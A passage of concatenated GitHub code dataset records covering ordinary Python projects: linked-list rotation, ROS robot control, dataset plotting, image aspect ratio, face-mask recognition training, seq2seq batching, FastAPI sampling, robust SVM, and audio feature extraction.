curr = curr.next\n n += 1\n last = prev\n \n \n k = k % n\n if k == 0:\n return head\n new_head = ListNode()\n current = head\n for i in range(n - k - 1):\n current = current.next\n \n new_head.next = current.next\n \n current.next = None\n last.next = head\n return new_head.next","repo_name":"Rediet-Ferew/competitive-programming","sub_path":"0061-rotate-list/0061-rotate-list.py","file_name":"0061-rotate-list.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37342543866","text":"#! /usr/bin/env python\nfrom simplified_dual_move_p import Dual_Move\nimport rospy\n'''run_first_pp_program = \npp_load + \npp.play +\nlisten to DOut[3] on pp\n\nrun_pp_program is listening to the digital output [3] in the pp robot \n\n'''\npick_and_place_robot = Dual_Move()\nprog_name = 'change this!!'\nround = 0\nwhile not rospy.is_shutdown():\n if round==0:\n pick_and_place_robot.run_first_pp_program()\n round = 1\n else:\n pick_and_place_robot.run_pp_program(prog_name)\n# In a different file\ndispense = Dual_Move()\nwhile not rospy.is_shutdown():\n # wait for the signal from \n dispense.run_d_program()\n ","repo_name":"evacheung0929/UR5e_Simulation_And_Dual_Arm_Control","sub_path":"Universal_Robots_ROS_Driver/ur_robot_driver/scripts/Dual_robot/IO/pickAndplace_run_final.py","file_name":"pickAndplace_run_final.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"61"} +{"seq_id":"16725305238","text":"import os\nimport random\nimport warnings\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport torchvision.transforms.functional as TF\nfrom catalog.transforms import MMdetDataset2Torchvision, UnNormalize\nfrom torchvision.transforms import Compose\nfrom utils.experiment import makedir\n\nfrom .vision import plot_image_classification, plot_object_detection\n\nfunction_for_plotting = {\n \"image classification\": plot_image_classification,\n \"object detection\": plot_object_detection,\n}\npreprocessor_factory = {\n \"convert-mmdetbbox\": [MMdetDataset2Torchvision(to_xywh=False)],\n}\n\n\ndef plot_sample(\n data, task, mode=\"save\", savedir=\"results/example.png\", label_map=None, **kwargs\n):\n get_image = function_for_plotting[task]\n image = get_image(label_map=label_map, **data, **kwargs)\n\n assert mode in [\"save\", \"return\"]\n if mode == \"save\":\n plt.imshow(image)\n plt.axis(\"off\")\n plt.savefig(savedir)\n elif mode == \"return\":\n return image\n else:\n raise ValueError(f\"Invalid value {mode} for `mode`.\")\n\n\ndef plot_samples_from_dataset(\n dataset,\n task,\n random_indices=True,\n subplot_dim=(5, 5),\n save_to=\"results/samples_vis.png\",\n root_dir=\"\",\n image_tensor_to_numpy=True,\n is_01=True,\n unnormalize=False,\n normalization_mean=(0.5, 0.5, 0.5),\n normalization_std=(0.5, 0.5, 0.5),\n resize_to=None,\n plot_size=3,\n preprocess_f=None,\n label_map=None,\n seed=42,\n **kwargs,\n):\n \"\"\"\n Plot multiple samples using matplotlib.\n TODO: write docstring.\n Parameters\n \"\"\"\n save_to = os.path.join(root_dir, save_to)\n makedir(save_to)\n\n # build preprocessor\n if preprocess_f in preprocessor_factory.keys():\n print(f\"Found preprocessor `{preprocess_f}`\")\n preprocess_f = Compose(preprocessor_factory[preprocess_f])\n\n w, h = subplot_dim\n plt.figure(figsize=(w * plot_size, h * plot_size))\n\n if random_indices:\n idx_iter = random.Random(seed).sample(range(len(dataset)), w * h)\n else:\n idx_iter = range(w * h)\n for idx, i in enumerate(idx_iter):\n data = dataset[i]\n\n if preprocess_f is not None:\n\n data = preprocess_f(data)\n if resize_to:\n data[\"images\"] = TF.resize(\n data[\"images\"], resize_to, interpolation=TF.InterpolationMode.NEAREST\n )\n if unnormalize:\n data = UnNormalize(normalization_mean, normalization_std, key=None)(data)\n if image_tensor_to_numpy:\n data[\"images\"] = data[\"images\"].permute(1, 2, 0).numpy()\n\n # warn about range of values.\n if data[\"images\"].min() < -0.1:\n warnings.warn(\n f\"Input image is expected to have positive pixel values but has minimum \\\n value of {data['images'].min()}. Are you sure you unnormalized the data?\"\n )\n if not is_01:\n if data[\"images\"].max() < 1.1:\n warnings.warn(\n f\"Input image is expected to be in range [0, 255] but has maximum \\\n value of {data['images'].max()}.\"\n )\n data[\"images\"] = data[\"images\"].astype(np.uint8)\n else:\n if data[\"images\"].max() > 1.1:\n warnings.warn(\n f\"Input image is expected to be in range [0, 1] but has maximum \\\n value of {data['images'].max()}.\"\n )\n\n plt.subplot(w, h, idx + 1)\n plot_image = plot_sample(\n data=data, task=task, mode=\"return\", label_map=label_map, **kwargs\n )\n plt.imshow(plot_image)\n plt.axis(\"off\")\n plt.tight_layout()\n plt.savefig(save_to)\n print(\"Visualization of training data saved in:\", save_to)\n plt.close()\n","repo_name":"sieu-n/awesome-modular-pytorch-lightning","sub_path":"utils/visualization/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3790,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"61"} +{"seq_id":"33981545014","text":"\"\"\"\n/*\n * Reto #5\n * ASPECT RATIO DE UNA IMAGEN\n * Fecha publicaci贸n enunciado: 01/02/22\n * Fecha publicaci贸n resoluci贸n: 07/02/22\n * Dificultad: DIF脥CIL\n *\n * Enunciado: Crea un programa que se encargue de calcular el aspect ratio de una imagen a partir de una url.\n * - Nota: Esta prueba no se puede resolver con el playground online de Kotlin. Se necesita Android Studio.\n * - Url de ejemplo: https://raw.githubusercontent.com/mouredev/mouredev/master/mouredev_github_profile.png\n * - Por ratio hacemos referencia por ejemplo a los \"16:9\" de una imagen de 1920*1080px.\n *\n * Informaci贸n adicional:\n * - Usa el canal de nuestro discord (https://mouredev.com/discord) \"馃攣reto-semanal\" para preguntas, dudas o prestar ayuda a la acomunidad.\n * - Puedes hacer un Fork del repo y una Pull Request al repo original para que veamos tu soluci贸n aportada.\n * - Revisar茅 el ejercicio en directo desde Twitch el lunes siguiente al de su publicaci贸n.\n * - Subir茅 una posible soluci贸n al ejercicio el lunes siguiente al de su publicaci贸n.\n *\n */\n\"\"\"\nimport requests\nimport math\nfrom PIL import Image\nfrom io import BytesIO\n\ndef get_image(url: str) -> Image:\n response = requests.get(url)\n img = Image.open(BytesIO(response.content))\n return img\n\ndef aspect_ratio(url: str) -> str:\n img = get_image(url)\n width, height = img.size\n if width == height:\n return \"1:1\"\n gcd = math.gcd(height, width)\n return f\"{width//gcd}:{height//gcd}\"\n\nif __name__ == \"__main__\":\n url = \"https://raw.githubusercontent.com/mouredev/mouredev/master/mouredev_github_profile.png\"\n print(aspect_ratio(url))\n","repo_name":"jmillana/code_challenges","sub_path":"challenges/5-aspectratio/aspect_ratio.py","file_name":"aspect_ratio.py","file_ext":"py","file_size_in_byte":1623,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11068641433","text":"import cv2\nimport os\nimport numpy as np\n\ndatos = \"Deteccion_facial/Personas/FotosConSinMascarilla\"\ncarpetas = os.listdir(datos)\nprint(\"Lista archivos:\", carpetas)\n\n\ntitulos = []\ndatosCara = []\nlabel = 0\n\nfor nombreCarpeta in carpetas:\n directorio = datos + \"/\" + nombreCarpeta\n \n for file_name in os.listdir(directorio):\n imagen = directorio + \"/\" + file_name\n print(imagen)\n image = cv2.imread(imagen, 0)\n cv2.imshow(\"Image\", image)\n cv2.waitKey(10)\n\n datosCara.append(image)\n titulos.append(label)\n label += 1\n\nprint(\"Etiqueta 0: \", np.count_nonzero(np.array(titulos) == 0))\nprint(\"Etiqueta 1: \", np.count_nonzero(np.array(titulos) == 1))\n\n# LBPH FaceRecognizer\nface_mask = cv2.face.LBPHFaceRecognizer_create()\n\nprint(\"Recopílando...\")\nface_mask.train(datosCara, np.array(titulos))\n\nface_mask.write(\"Deteccion_facial/modelo_mascarilla.xml\")\nprint(\"Modelo almacenado\")\n","repo_name":"NicoVivas27/Deteccion-objetos","sub_path":"Deteccion_facial/generarModelo.py","file_name":"generarModelo.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35989538558","text":"import queue\nfrom random import shuffle\nimport codecs\nimport json\nimport glob\nimport numpy as np\nimport tensorflow as tf\nimport data\nfrom nltk.tokenize import sent_tokenize\n\nfrom nltk import tokenize\n\nFLAGS = tf.app.flags.FLAGS\nclass Srl_Example(object):\n\n\n def __init__(self, text, srl, vocab, hps, mode=\"None\"):\n start_decoding = vocab.word2id(data.START_DECODING)\n stop_decoding = vocab.word2id(data.STOP_DECODING)\n\n\n self.hps = hps\n\n srl_sen_words = tokenize.word_tokenize(srl.strip())\n #shuffle(srl_sen_words)\n if mode == \"train\" and len(srl_sen_words) > 5:\n srl_sen_words = srl_sen_words[:np.random.randint(5, len(srl_sen_words))]\n if len(srl_sen_words) > hps.srl_max_enc_seq_len.value:\n srl_sen_words = srl_sen_words[:hps.srl_max_enc_seq_len.value]\n\n self.enc_input = [vocab.word2id(w) for w in\n srl_sen_words] # list of word ids; OOVs are represented by the id for UNK token\n\n self.enc_len = len(self.enc_input)\n\n\n article_sen = text\n article_sen_words = tokenize.word_tokenize(article_sen.strip())\n if len(article_sen_words) > hps.srl_max_dec_seq_len.value:\n article_sen_words = article_sen_words[:hps.srl_max_dec_seq_len.value]\n\n\n abs_ids = [vocab.word2id(w) for w in\n article_sen_words] # list of word ids; OOVs are represented by the id for UNK token\n\n # Get the decoder input sequence and target sequence\n self.dec_input, self.target = self.get_dec_inp_targ_seqs(abs_ids, hps.srl_max_dec_seq_len.value,\n start_decoding,\n stop_decoding) # max_sen_num,max_len, start_doc_id, end_doc_id,start_id, stop_id\n self.dec_len = len(self.dec_input)\n #self.dec_sen_len = [len(sentence) for sentence in self.target]\n\n self.orig_input = srl\n self.orig_output = text\n\n\n def get_dec_inp_targ_seqs(self, sequence, max_len, start_id, stop_id):\n \"\"\"Given the reference summary as a sequence of tokens, return the input sequence for the decoder, and the target sequence which we will use to calculate loss. The sequence will be truncated if it is longer than max_len. The input sequence must start with the start_id and the target sequence must end with the stop_id (but not if it's been truncated).\n\n Args:\n sequence: List of ids (integers)\n max_len: integer\n start_id: integer\n stop_id: integer\n\n Returns:\n inp: sequence length <=max_len starting with start_id\n target: sequence same length as input, ending with stop_id only if there was no truncation\n \"\"\"\n\n inps = sequence[:]\n targets = sequence[:]\n\n\n inps = [start_id] + inps[:]\n if len(inps) > max_len:\n inps = inps[:max_len]\n\n if len(targets) >= max_len:\n targets = targets[:max_len - 1] # no end_token\n targets.append(stop_id) # end token\n else:\n targets = targets + [stop_id]\n\n return inps, targets\n\n def pad_decoder_inp_targ(self, max_sen_len, pad_doc_id):\n \"\"\"Pad decoder input and target sequences with pad_id up to max_len.\"\"\"\n\n\n\n\n while len(self.dec_input) < max_sen_len:\n self.dec_input.append(pad_doc_id)\n\n\n\n while len(self.target) < max_sen_len:\n self.target.append(pad_doc_id)\n\n\n def pad_encoder_inp_targ(self, max_sen_len, pad_doc_id):\n \"\"\"Pad decoder input and target sequences with pad_id up to max_len.\"\"\"\n\n\n while len(self.enc_input) < max_sen_len:\n self.enc_input.append(pad_doc_id)\n\n\n\n\n\n\n\nclass Srl_Batch(object):\n \"\"\"Class representing a minibatch of train/val/test examples for text summarization.\"\"\"\n\n def __init__(self, example_list, hps, vocab):\n \"\"\"Turns the example_list into a Batch object.\n\n Args:\n example_list: List of Example objects\n hps: hyperparameters\n vocab: Vocabulary object\n \"\"\"\n self.pad_id = vocab.word2id(data.PAD_TOKEN) # id of the PAD token used to pad sequences\n self.init_decoder_seq(example_list, hps) # initialize the input to the encoder\n\n def init_decoder_seq(self, example_list, hps):\n\n for ex in example_list:\n ex.pad_decoder_inp_targ(hps.srl_max_dec_seq_len.value, self.pad_id)\n ex.pad_encoder_inp_targ(hps.srl_max_enc_seq_len.value, self.pad_id)\n #pad_encoder_inp_targ(self, max_sen_len, max_sen_num, pad_doc_id):\n\n # Initialize the numpy arrays.\n # Note: our decoder inputs and targets must be the same length for each batch (second dimension = max_dec_steps) because we do not use a dynamic_rnn for decoding. However I believe this is possible, or will soon be possible, with Tensorflow 1.0, in which case it may be best to upgrade to that.\n\n self.enc_batch = np.zeros((hps.batch_size.value, hps.srl_max_enc_seq_len.value), dtype=np.int32)\n self.enc_lens = np.ones((hps.batch_size.value), dtype=np.int32)\n #self.dec_lens = np.zeros((hps.batch_size), dtype=np.int32)\n self.dec_batch = np.zeros((hps.batch_size.value, hps.srl_max_dec_seq_len.value), dtype=np.int32)\n self.target_batch = np.zeros((hps.batch_size.value, hps.srl_max_dec_seq_len.value), dtype=np.int32)\n self.dec_padding_mask = np.zeros((hps.batch_size.value, hps.srl_max_dec_seq_len.value),\n dtype=np.float32)\n #self.labels = np.zeros((hps.batch_size, hps.max_enc_sen_num, hps.max_enc_seq_len), dtype=np.int32)\n #self.dec_sen_lens = np.zeros((hps.batch_size, hps.srl_max_dec_sen_num), dtype=np.int32)\n self.dec_lens = np.zeros((hps.batch_size.value), dtype=np.int32)\n self.orig_outputs = []\n self.orig_inputs = []\n\n for i, ex in enumerate(example_list):\n #self.new_review_text = []\n #self.labels[i]=np.array([[ex.label for k in range(hps.max_enc_seq_len) ] for j in range(hps.max_enc_sen_num)])\n self.orig_outputs.append(ex.orig_output)\n self.orig_inputs.append(ex.orig_input)\n\n self.dec_lens[i] = ex.dec_len\n self.enc_lens[i] = ex.enc_len\n self.dec_batch[i, :] = np.array(ex.dec_input)\n self.enc_batch[i, :] = np.array(ex.enc_input)\n self.target_batch[i] = np.array(ex.target)\n\n\n self.target_batch = np.reshape(self.target_batch,\n [hps.batch_size.value, hps.srl_max_dec_seq_len.value])\n\n\n for i in range(len(self.target_batch)):\n for k in range(len(self.target_batch[i])):\n if int(self.target_batch[i][k]) != self.pad_id:\n self.dec_padding_mask[i][k] = 1\n\n\n self.dec_batch = np.reshape(self.dec_batch, [hps.batch_size.value, hps.srl_max_dec_seq_len.value])\n self.dec_lens = np.reshape(self.dec_lens, [hps.batch_size.value])\n\n self.enc_batch = np.reshape(self.enc_batch, [hps.batch_size.value, hps.srl_max_enc_seq_len.value])\n self.enc_lens = np.reshape(self.enc_lens, [hps.batch_size.value])\n #self.labels = np.reshape(self.labels, [hps.batch_size * hps.max_enc_sen_num, hps.max_enc_seq_len])\n\n\n\n\n\nclass Srl_GenBatcher(object):\n def __init__(self, vocab, hps):\n self._vocab = vocab\n self._hps = hps\n\n self.train_queue = self.fill_example_queue(\"data/0/train.txt\", \"train\")\n self.valid_queue = self.fill_example_queue(\"data/0/valid.txt\", \"valid\")\n self.test_queue = self.fill_example_queue(\"data/0/test.txt\", \"test\")\n\n # self.valid_transfer_queue_negetive = self.fill_example_queue(\n # \"valid/*\", mode=\"valid\", target_score=0)\n\n\n # self.test_queue = self.fill_example_queue(\"/home/xujingjing/code/review_summary/dataset/review_generation_dataset/test/*\")\n self.train_batch = self.create_batch(mode=\"train\")\n self.valid_batch = self.create_batch(mode=\"validation\", shuffleis=False)\n self.test_batch = self.create_batch(mode=\"test\", shuffleis=False)\n # train_batch = self.create_bach(mode=\"train\")\n\n def create_batch(self, mode=\"train\", shuffleis=True):\n all_batch = []\n\n if mode == \"train\":\n num_batches = int(len(self.train_queue) / self._hps.batch_size.value)\n\n\n elif mode == 'validation':\n num_batches = int(len(self.valid_queue) / self._hps.batch_size.value)\n\n elif mode == 'test':\n num_batches = int(len(self.test_queue) / self._hps.batch_size.value)\n\n\n for i in range(0, num_batches):\n batch = []\n if mode == 'train':\n batch += (\n self.train_queue[i * self._hps.batch_size.value:i * self._hps.batch_size.value + self._hps.batch_size.value])\n elif mode == 'validation':\n batch += (\n self.valid_queue[i * self._hps.batch_size.value:i * self._hps.batch_size.value + self._hps.batch_size.value])\n\n elif mode == 'test':\n batch += (\n self.test_queue[i * self._hps.batch_size.value:i * self._hps.batch_size.value + self._hps.batch_size.value])\n\n all_batch.append(Srl_Batch(batch, self._hps, self._vocab))\n\n if mode == \"train\" and shuffleis:\n shuffle(all_batch)\n\n return all_batch\n\n\n\n\n def get_batches(self, mode=\"train\"):\n\n if mode == \"train\":\n shuffle(self.train_batch)\n return self.train_batch\n elif mode == 'validation':\n return self.valid_batch\n elif mode == 'test':\n return self.test_batch\n\n def fill_example_queue(self, data_path, mode=\"None\"):\n\n new_queue = []\n\n reader = codecs.open(data_path, 'r', 'utf-8')\n j = 0\n while True:\n \n\n string_ = reader.readline()\n if not string_: break\n dict_example = json.loads(string_)\n srl = dict_example[\"skeleton\"]\n srl = srl.split(\"|||\")\n\n text = dict_example[\"text\"]\n text = sent_tokenize(text)\n for i,skeleton in enumerate(srl):\n \n example = Srl_Example(text[i], srl[i], self._vocab, self._hps,mode)\n new_queue.append(example)\n\n\n\n\n return new_queue\n\n\n\n","repo_name":"feliciss/Auto-Narrative-Generation-DL-with-Human-Intervence","sub_path":"code1/srl_seq_batch.py","file_name":"srl_seq_batch.py","file_ext":"py","file_size_in_byte":10240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34147985951","text":"from fastapi import FastAPI, File, UploadFile, Form\r\nfrom sklearn.model_selection import train_test_split\r\nimport pandas as pd\r\n\r\napp = FastAPI()\r\n\r\n\r\n@app.get(\"/\")\r\ndef index():\r\n return {\"name\": \"First Data\"}\r\n\r\n\r\n@app.post(\"/randomsample/\")\r\nasync def generate_samples(samples: int = Form(default=1), ratio: float = Form(default=0.75), csv_file: UploadFile = File(...)):\r\n print(samples, csv_file)\r\n population = pd.read_csv(csv_file.file)\r\n train = population.sample(frac=ratio)\r\n train.to_csv('1_train.csv', encoding='utf-8')\r\n remaining_population = population.loc[~population.index.isin(train.index), :]\r\n remaining_samples = samples-1\r\n for i in range(1, remaining_samples + 1):\r\n test = remaining_population\r\n test = test.sample(frac=i/remaining_samples)\r\n test.to_csv(f'{i}_test.csv', encoding='utf-8')\r\n remaining_population = remaining_population.loc[~remaining_population.index.isin(test.index), :]\r\n return {\"message\": f'{samples} sample created'}\r\n\r\n\r\n@app.post(\"/sklearnsample/\")\r\nasync def create_upload_file(response: str = Form(...), algo: str = Form(...), stratify_col: str = Form(default=''),\r\n csv_file: UploadFile = File(...)):\r\n population = pd.read_csv(csv_file.file)\r\n # response = 'co2emissions'\r\n y = population[[response]]\r\n predictors = list(population.columns)\r\n predictors.remove(response)\r\n x = population[predictors]\r\n if algo == \"simple\":\r\n x_train, x_test, y_train, y_test = train_test_split(x, y, random_state=1234)\r\n else:\r\n x_train, x_test, y_train, y_test = train_test_split(x, y, random_state=1234, stratify=x[stratify_col])\r\n x_train.to_csv('x_train.csv', encoding='utf-8')\r\n x_test.to_csv('x_test.csv', encoding='utf-8')\r\n\r\n y_train.to_csv('y_train.csv', encoding='utf-8')\r\n y_test.to_csv('y_test.csv', encoding='utf-8')\r\n return {\"message\": \" samples created: x_train, x_test, y_train, y_test\"}\r\n","repo_name":"mihirlaldas/ds-backend","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74126377475","text":"\"\"\"\nAn implementation of Robust SVM.\n\n2020.11.14\n\nReference: Bertsimas, D., Dunn, J., Pawlowski, C., & Zhuo, Y. D. (2019).\n Robust classification. INFORMS Journal on Optimization, 1(1), 2-34.\n\"\"\"\n\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow import keras\nimport tensorflow_datasets as tfds\nfrom sklearn import datasets\nfrom sklearn.metrics import hinge_loss\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import normalize\nfrom sklearn.svm import SVC\nimport collections\nfrom gurobipy import *\nimport matplotlib.pyplot as plt\nfrom utils import load_data\n\nnp.random.seed(1)\n\nDATA_LIST = [\"synthetic\", \"wine\", \"credit\"]\n\n\ni = 0\nfor dataset in DATA_LIST:\n\n plt.figure(i)\n\n X_train, X_test, Y_train, Y_test = load_data(dataset)\n\n # Create two lists - \"x_axis\" and \"y_axis\" for storing the according\n # hyperparameter and the loss for each hyperparameter.\n x_axis = []\n y_axis = []\n\n print(collections.Counter(Y_train))\n\n print(X_train.shape)\n print(Y_train)\n\n\n NUM_DATA = X_train.shape[0]\n NUM_FEATURES = X_train.shape[1]\n\n print(\"Now processing dataset: {}\".format(dataset))\n print(\"# features: {}, # data points: {}\".format(NUM_FEATURES, NUM_DATA))\n\n if dataset == 'synthetic':\n rho_list = np.linspace(0, 0.5, 25)\n else:\n rho_list = np.linspace(0, 0.0002, 25)\n\n ########### Use Gurobi to train SVMs under different degrees of robustness #############\n for rho in rho_list:\n\n SVM = Model(\"robust_svm\")\n\n itas = SVM.addVars(range(NUM_DATA), vtype=GRB.CONTINUOUS, obj=[1]*NUM_DATA)\n W = SVM.addVars(range(NUM_FEATURES), lb=-GRB.INFINITY, vtype=GRB.CONTINUOUS, obj=[0]*NUM_FEATURES)\n b = SVM.addVar(vtype=GRB.CONTINUOUS, lb=-GRB.INFINITY, obj=0)\n W_abs = SVM.addVars(range(NUM_FEATURES), vtype=GRB.CONTINUOUS, obj=0)\n\n SVM.modelSense = GRB.MINIMIZE\n SVM.Params.outputFlag = 0\n SVM.addConstrs(W_abs[i] == abs_(W[i]) for i in range(NUM_FEATURES))\n\n for i in range(NUM_DATA):\n SVM.addConstr(Y_train[i] * (quicksum([W[j] * X_train[i][j] for j in \\\n range(NUM_FEATURES)]) - b) - rho * W_abs.sum('*') >= 1 - itas[i])\n\n SVM.optimize()\n\n W_np = np.zeros(NUM_FEATURES)\n for j in range(NUM_FEATURES):\n W_np[j] = W[j].x\n W_np = W_np.reshape((W_np.shape[0], 1))\n Y_pred = X_test @ W_np - b.x\n # Y_pred = np.where(Y_pred > 0, 1, -1)\n Y_pred = Y_pred.reshape((Y_pred.shape[0],))\n Y_pred = np.where(Y_pred < 0, -1, Y_pred)\n Y_pred = np.where(Y_pred >= 0, 1, Y_pred)\n print(\"Y_test: {}, Y_pred: {}\".format(Y_test.shape, Y_pred.shape))\n acc = sum(Y_pred.flatten() == Y_test) / len(Y_test)\n #loss = hinge_loss(Y_test, Y_pred)\n #print(\"the test hinge loss for SVM under rho = {}: {}\".format(rho, loss))\n\n x_axis.append(rho)\n y_axis.append(acc)\n\n plt.title(\"accuracy vs. robustness in SVM - {}\".format(dataset))\n plt.plot(x_axis, y_axis)\n plt.xlabel('rho')\n plt.ylabel('accuracy')\n plt.ticklabel_format(style='sci', axis='x', scilimits=(0,0))\n plt.savefig(\"SVM_{}.png\".format(dataset))\n\n i += 1\n","repo_name":"DarrenZhang01/robust_classification","sub_path":"robust_svm.py","file_name":"robust_svm.py","file_ext":"py","file_size_in_byte":3102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36438367679","text":"import ast\nimport threading\nimport time\n\nimport helper\nfrom holon.HolonicAgent import HolonicAgent\nfrom brain import brain_helper\n\n\nlogger = helper.get_logger()\n\n\nclass Conscious(HolonicAgent):\n def __init__(self, cfg):\n self._init = False\n super().__init__(cfg)\n\n\n def _on_connect(self):\n super()._on_connect()\n\n\n def _on_topic(self, topic, data):\n super()._on_topic(topic, data)\n\n\n def _live(self):\n if not self._init:\n self._init = True\n time.sleep(3)\n # brain_helper.speak(self, \"Good morning, Mr. Zhang. It's a sunny day today, perfect for a walk! How did you sleep last night?\")\n brain_helper.speak(self, \"早安,張先生。今天天氣不錯,很適合散步哦。您今天睡得怎麼樣?\")\n # time.sleep(20)\n # self._init = False\n \n \n def _running(self):\n while self._is_running():\n try:\n self._live()\n time.sleep(.1)\n except Exception as ex:\n logger.exception(ex)\n","repo_name":"mfshiu/parallel_tts","sub_path":"brain/conscious.py","file_name":"conscious.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26047306625","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.stats import linregress, t, sem\n\n\ndef get_data_from_file(filepath):\n \"\"\" Read mass meseaurment from data capture file \"\"\"\n data = list()\n with open(filepath, \"r\") as fd:\n lines = fd.readlines()\n for line in lines:\n m = line.split()[2]\n data.append(float(m))\n return data\n\ndef mean_confidence_interval(data_raw, confidence=0.95):\n data = 1.0 * np.array(data_raw)\n n = len(data)\n mean, std_err_mean = np.mean(data), sem(data)\n h = std_err_mean * t.ppf((1 + confidence) / 2., n-1)\n return mean, mean-h, mean+h\n\n# Import data from files\ncapt_2 = get_data_from_file(\"../capture2\")\ncapt_3 = get_data_from_file(\"../capture3\")\ncapt_4 = get_data_from_file(\"../capture4\")\n\n# Reducing capt_2 to one point per mass\nmeas = [\n capt_2[0:30],\n capt_2[32:73],\n capt_2[77:129],\n capt_2[132:169],\n capt_2[172:203],\n capt_2[210:240],\n capt_2[243:281],\n capt_2[286:323],\n capt_2[326:354],\n capt_2[360:387],\n capt_2[389:],\n]\ny2 = [np.mean(i) for i in meas]\nx2 = [i for i in range(0, len(y2))]\n\npcc_2 = linregress(x2,y2)[2]\nprint(\"PPC capt_2: %s\" % str(pcc_2))\n\n# fit capt_2 to linear function\nfit_2 = np.polyfit(x2, y2, 1)\nfit_fn_2 = np.poly1d(fit_2)\nprint(\"capt_2 fn: %s\" % fit_fn_2)\n\n# plot capt_2\nplt.plot(x2, y2, \"yo\", label=\"capt_2_points\")\nplt.plot(x2, fit_fn_2(x2), \"--k\", label=\"capt_2_fit: %s\" % fit_fn_2)\n\n# Reducing capt_3 to one point per mass\nmeas = [\n capt_3[27:80],\n capt_3[143:191],\n capt_3[254:313],\n capt_3[378:426],\n capt_3[486:525],\n capt_3[585:623],\n capt_3[679:718],\n capt_3[775:823],\n capt_3[895:951],\n capt_3[1031:1089],\n]\ny3 = [np.mean(i) for i in meas]\nx3 = [i for i in range(0, len(y3))]\n\nprint(\"Data points capt_3: %s\" % y3)\nmean, s1, s2 = mean_confidence_interval(y3)\nprint(\"mean: %s, s1: %s, s2: %s\" % mean_confidence_interval(y3))\nprint(\"Distance to mean: %s\" % (mean-s1)) \n\npcc_3 = linregress(x3,y3)[2]\nprint(\"PPC capt_3: %s\" % str(pcc_3))\n\n# fit capt_3 to linear function\nfit_3 = np.polyfit(x3, y3, 1)\nfit_fn_3 = np.poly1d(fit_3)\n\n# Reducing capt_4 to one point per mass\nmeas = [\n capt_4[0:167],\n capt_4[169:206],\n capt_4[210:259],\n capt_4[254:285],\n capt_4[287:333],\n capt_4[337:383],\n capt_4[388:438],\n capt_4[444:489],\n capt_4[495:537],\n capt_4[542:583],\n capt_4[587:]\n]\ny4 = [np.mean(i) for i in meas]\nx4 = [i for i in range(0, len(y4))]\n\npcc_4 = linregress(x4,y4)[2]\nprint(\"PPC capt_4: %s\" % str(pcc_4))\n\n# fit capt_4 to linear function\nfit_4 = np.polyfit(x4, y4, 1)\nfit_fn_4 = np.poly1d(fit_4)\nprint(\"capt_4 fn: %s\" % fit_fn_4)\n\n# plot capt_4\nplt.plot(x4, y4, \"ro\", label=\"capt_4_points\")\nplt.plot(x4, fit_fn_4(x4), \"-k\", label=\"capt_4_fit: %s\" % fit_fn_4)\n\nplt.legend()\nplt.title(\"Zero-drift and Sensitivity-drift\")\nplt.ylabel(\"Weight / kg\")\nplt.xlabel(\"Number of nuts\")\nplt.show()\n","repo_name":"Hogfeldt/gfv1","sub_path":"Lab4/databehandling/databehandling.py","file_name":"databehandling.py","file_ext":"py","file_size_in_byte":2967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20656705204","text":"import csv\nimport os\nimport librosa\nimport numpy as np\n\nimport pandas as pd\nimport scipy\nfrom sklearn.metrics import mean_absolute_percentage_error\n\nN_MFCC = 20\n\nfilepath = \"./data/Sounds-dataset/Алексей/Вход-не распознано Алексей.wav\"\n\ny, sr = librosa.load(filepath, mono=True)\n\ndef find_match(file1, file2):\n for w in [\"Вход\", \"Пицца\", \"Привет\", \"Собака\", \"Шкаф\"]:\n if w in file1 and w in file2:\n return 1\n return 0\n\n\ndef get_features(y, sr):\n features = []\n features.extend([np.mean(e) for e in librosa.feature.mfcc(y=y, sr=sr, n_mfcc=20)]) #mfcc_mean\n features.extend([np.std(e) for e in librosa.feature.mfcc(y=y, sr=sr, n_mfcc=20)]) # mfcc_std\n features.append(np.mean(librosa.feature.spectral_centroid(y=y, sr=sr).T,axis=0)[0]) # cent_mean\n features.append(np.std(librosa.feature.spectral_centroid(y=y, sr=sr).T,axis=0)[0]) # cent_std\n features.append(scipy.stats.skew(librosa.feature.spectral_centroid(y=y, sr=sr).T,axis=0)[0]) # cent_skew\n features.append(np.mean(librosa.feature.spectral_rolloff(y=y, sr=sr).T,axis=0)[0]) # rolloff_mean\n features.append(np.std(librosa.feature.spectral_rolloff(y=y, sr=sr).T,axis=0)[0]) # roloff_std\n return features\n\ndef get_headers(files_n = 2,mfcc_n=20, include_dirs = False):\n header = []\n if include_dirs:\n for n in range(files_n):\n header.append(f'dir{n}')\n for n in range(files_n):\n header.append(f'fname{n}')\n for n in range(files_n):\n header.extend([f'f{n}_mfcc_mean{i}' for i in range(1, mfcc_n+1)])\n header.extend([f'f{n}_mfcc_std{i}' for i in range(1, mfcc_n+1)])\n header.extend([f'f{n}_cent_mean', f'f{n}_cent_std', f'f{n}_cent_skew', f'f{n}_rolloff_mean', f'f{n}_rolloff_std'])\n return header\n\n#execute once to create feature table\ndef create_features_table(table_file_name):\n with open(table_file_name, 'w', encoding='cp1251', newline ='') as file:\n writer = csv.writer(file, delimiter=',')\n h = get_headers(1, include_dirs=True)\n 